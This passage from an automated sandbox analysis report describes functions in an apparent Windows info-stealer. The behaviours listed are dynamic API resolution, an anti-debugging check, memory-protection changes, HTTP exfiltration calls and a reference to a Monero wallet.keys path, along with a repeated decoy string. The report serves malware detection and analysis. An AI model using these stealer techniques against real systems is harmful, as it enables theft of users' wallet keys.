                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: a44feadb90cc505beede032d129dc9084d021e2142801c4348d2013099980228
                          • Instruction ID: 0ee67c7b95884f27bd92ace295ffc75e8cc3b00db52c54b65b6ea23296e5b7b7
                          • Opcode Fuzzy Hash: a44feadb90cc505beede032d129dc9084d021e2142801c4348d2013099980228
                          • Instruction Fuzzy Hash: 39A108B5510344AFD74CEFA8EDD8A663BF9F78C303714872AA64583264D63DA841CF62
                          Function 006145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 6145c0-614695 RtlAllocateHeap 781 6146a0-6146a6 764->781 782 6146ac-61474a 781->782 783 61474f-6147a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0061460F
                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0061479C
                          Strings
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145E8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614657
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614770
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146B7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614734
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146D8
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146CD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614683
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614729
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614638
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061474F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614678
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145C7
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614622
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145DD
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061466D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145F3
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614617
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614643
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614662
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614713
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061477B
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061462D
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061473F
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146AC
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006146C2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061471E
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006145D2
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0061475A
                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00614765
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeapProtectVirtual
                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                          • API String ID: 1542196881-2218711628
                          • Opcode ID: 01c46b4adba50ab7e0f71131175deb3fc65acaf370711d5d587f73e3dcc99e81
                          • Instruction ID: c7f96c518c49d94672e25481ba516083bb3aaeb241560f1a2798b90a4f902921
                          • Opcode Fuzzy Hash: 01c46b4adba50ab7e0f71131175deb3fc65acaf370711d5d587f73e3dcc99e81
                          • Instruction Fuzzy Hash: D94141607E36047AF678BBA4AA6EFDD73679F72B04F917064E802532C0CBB0750045A6
                          Function 00614880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 801 614880-614942 call 62a7a0 call 6147b0 call 62a740 * 5 InternetOpenA StrCmpCA 816 614944 801->816 817 61494b-61494f 801->817 816->817 818 614955-614acd call 628b60 call 62a920 call 62a8a0 call 62a800 * 2 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a920 call 62a8a0 call 62a800 * 2 InternetConnectA 817->818 819 614ecb-614ef3 InternetCloseHandle call 62aad0 call 619ac0 817->819 818->819 905 614ad3-614ad7 818->905 829 614f32-614fa2 call 628990 * 2 call 62a7a0 call 62a800 * 8 819->829 830 614ef5-614f2d call 62a820 call 62a9b0 call 62a8a0 call 62a800 819->830 830->829 906 614ae5 905->906 907 614ad9-614ae3 905->907 908 614aef-614b22 HttpOpenRequestA 906->908 907->908 909 614b28-614e28 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a9b0 call 62a8a0 call 62a800 call 62a920 call 62a8a0 call 62a800 call 62a740 call 62a920 * 2 call 62a8a0 call 62a800 * 2 call 62aad0 lstrlen call 62aad0 * 2 lstrlen call 62aad0 HttpSendRequestA 908->909 910 614ebe-614ec5 InternetCloseHandle 908->910 1021 614e32-614e5c InternetReadFile 909->1021 910->819 1022 614e67-614eb9 InternetCloseHandle call 62a800 1021->1022 1023 614e5e-614e65 1021->1023 1022->910 1023->1022 1024 614e69-614ea7 call 62a9b0 call 62a8a0 call 62a800 1023->1024 1024->1021
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00614915
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 0061493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00614ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00630DDB,00000000,?,?,00000000,?,",00000000,?,0111E848), ref: 00614DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00614E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00614E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00614E49
                          • InternetCloseHandle.WININET(00000000), ref: 00614EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00614EC5
                          • HttpOpenRequestA.WININET(00000000,0111E898,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00614B15
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                          • InternetCloseHandle.WININET(00000000), ref: 00614ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 4bb2de15b0af3fa0947aa4eb446b756ca6d29fb40c5a8484a9eb392cc15fa061
                          • Instruction ID: d84c0baffae66be4f656ee28471622af22679b79347164ede6d91a3f492fb299
                          • Opcode Fuzzy Hash: 4bb2de15b0af3fa0947aa4eb446b756ca6d29fb40c5a8484a9eb392cc15fa061
                          • Instruction Fuzzy Hash: 3812CB71911528ABDB55EB90EC92FEEB37ABF14300F50419DF10662091DFB42B89CF6A
                          Function 00627850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: db9f1f14a16421bcaa6900738c6a252eac1f21d8a7e2519a1818b05ee3f14c17
                          • Instruction ID: 89374b62ef015448b8c090ecd0bcd8bd38eb83b657b2c25f367743ba3a60c772
                          • Opcode Fuzzy Hash: db9f1f14a16421bcaa6900738c6a252eac1f21d8a7e2519a1818b05ee3f14c17
                          • Instruction Fuzzy Hash: 77F04FB1944608ABC704DF98DD89FAEBBB8FB08712F10026AFA05A2680C77915048BA1
                          Function 00611160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: c8ddb5406c0630bb2d6bd2bcb38e3398ebb16bc91e5507f82a05baf08813f33c
                          • Instruction ID: 6a8da9df64c22bd79732b9d476085bf6afd6ffe54305fa6836755fc949ca83ea
                          • Opcode Fuzzy Hash: c8ddb5406c0630bb2d6bd2bcb38e3398ebb16bc91e5507f82a05baf08813f33c
                          • Instruction Fuzzy Hash: E8D05E7490030CDBCB04DFE0D88A6DDBB78FB0C312F000698D90562340EA306485CAA6
                          Function 00629C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 633 629c10-629c1a 634 629c20-62a031 GetProcAddress * 43 633->634 635 62a036-62a0ca LoadLibraryA * 8 633->635 634->635 636 62a146-62a14d 635->636 637 62a0cc-62a141 GetProcAddress * 5 635->637 638 62a153-62a211 GetProcAddress * 8 636->638 639 62a216-62a21d 636->639 637->636 638->639 640 62a298-62a29f 639->640 641 62a21f-62a293 GetProcAddress * 5 639->641 642 62a337-62a33e 640->642 643 62a2a5-62a332 GetProcAddress * 6 640->643 641->640 644 62a344-62a41a GetProcAddress * 9 642->644 645 62a41f-62a426 642->645 643->642 644->645 646 62a4a2-62a4a9 645->646 647 62a428-62a49d GetProcAddress * 5 645->647 648 62a4ab-62a4d7 GetProcAddress * 2 646->648 649 62a4dc-62a4e3 646->649 647->646 648->649 650 62a515-62a51c 649->650 651 62a4e5-62a510 GetProcAddress * 2 649->651 652 62a612-62a619 650->652 653 62a522-62a60d GetProcAddress * 10 650->653 651->650 654 62a61b-62a678 GetProcAddress * 4 652->654 655 62a67d-62a684 652->655 653->652 654->655 656 62a686-62a699 GetProcAddress 655->656 657 62a69e-62a6a5 655->657 656->657 658 62a6a7-62a703 GetProcAddress * 4 657->658 659 62a708-62a709 657->659 658->659
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01105850), ref: 00629C2D
                          • GetProcAddress.KERNEL32(74DD0000,011056D0), ref: 00629C45
                          • GetProcAddress.KERNEL32(74DD0000,01119670), ref: 00629C5E
                          • GetProcAddress.KERNEL32(74DD0000,01119688), ref: 00629C76
                          • GetProcAddress.KERNEL32(74DD0000,011196D0), ref: 00629C8E
                          • GetProcAddress.KERNEL32(74DD0000,01119610), ref: 00629CA7
                          • GetProcAddress.KERNEL32(74DD0000,0110BD10), ref: 00629CBF
                          • GetProcAddress.KERNEL32(74DD0000,0111D4D0), ref: 00629CD7
                          • GetProcAddress.KERNEL32(74DD0000,0111D4B8), ref: 00629CF0
                          • GetProcAddress.KERNEL32(74DD0000,0111D5A8), ref: 00629D08
                          • GetProcAddress.KERNEL32(74DD0000,0111D578), ref: 00629D20
                          • GetProcAddress.KERNEL32(74DD0000,01105870), ref: 00629D39
                          • GetProcAddress.KERNEL32(74DD0000,011056B0), ref: 00629D51
                          • GetProcAddress.KERNEL32(74DD0000,011058B0), ref: 00629D69
                          • GetProcAddress.KERNEL32(74DD0000,01105890), ref: 00629D82
                          • GetProcAddress.KERNEL32(74DD0000,0111D488), ref: 00629D9A
                          • GetProcAddress.KERNEL32(74DD0000,0111D4E8), ref: 00629DB2
                          • GetProcAddress.KERNEL32(74DD0000,0110BCC0), ref: 00629DCB
                          • GetProcAddress.KERNEL32(74DD0000,011058D0), ref: 00629DE3
                          • GetProcAddress.KERNEL32(74DD0000,0111D500), ref: 00629DFB
                          • GetProcAddress.KERNEL32(74DD0000,0111D518), ref: 00629E14
                          • GetProcAddress.KERNEL32(74DD0000,0111D530), ref: 00629E2C
                          • GetProcAddress.KERNEL32(74DD0000,0111D560), ref: 00629E44
                          • GetProcAddress.KERNEL32(74DD0000,011059D0), ref: 00629E5D
                          • GetProcAddress.KERNEL32(74DD0000,0111D4A0), ref: 00629E75
                          • GetProcAddress.KERNEL32(74DD0000,0111D590), ref: 00629E8D
                          • GetProcAddress.KERNEL32(74DD0000,0111D3F8), ref: 00629EA6
                          • GetProcAddress.KERNEL32(74DD0000,0111D440), ref: 00629EBE
                          • GetProcAddress.KERNEL32(74DD0000,0111D410), ref: 00629ED6
                          • GetProcAddress.KERNEL32(74DD0000,0111D548), ref: 00629EEF
                          • GetProcAddress.KERNEL32(74DD0000,0111D428), ref: 00629F07
                          • GetProcAddress.KERNEL32(74DD0000,0111D458), ref: 00629F1F
                          • GetProcAddress.KERNEL32(74DD0000,0111D470), ref: 00629F38
                          • GetProcAddress.KERNEL32(74DD0000,0111A660), ref: 00629F50
                          • GetProcAddress.KERNEL32(74DD0000,0111CE28), ref: 00629F68
                          • GetProcAddress.KERNEL32(74DD0000,0111CE10), ref: 00629F81
                          • GetProcAddress.KERNEL32(74DD0000,011059F0), ref: 00629F99
                          • GetProcAddress.KERNEL32(74DD0000,0111D008), ref: 00629FB1
                          • GetProcAddress.KERNEL32(74DD0000,01105A10), ref: 00629FCA
                          • GetProcAddress.KERNEL32(74DD0000,0111D050), ref: 00629FE2
                          • GetProcAddress.KERNEL32(74DD0000,0111CEE8), ref: 00629FFA
                          • GetProcAddress.KERNEL32(74DD0000,01105A70), ref: 0062A013
                          • GetProcAddress.KERNEL32(74DD0000,01105AB0), ref: 0062A02B
                          • LoadLibraryA.KERNEL32(0111CE58,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A03D
                          • LoadLibraryA.KERNEL32(0111D0E0,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A04E
                          • LoadLibraryA.KERNEL32(0111CEB8,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A060
                          • LoadLibraryA.KERNEL32(0111CF78,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A072
                          • LoadLibraryA.KERNEL32(0111CDF8,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A083
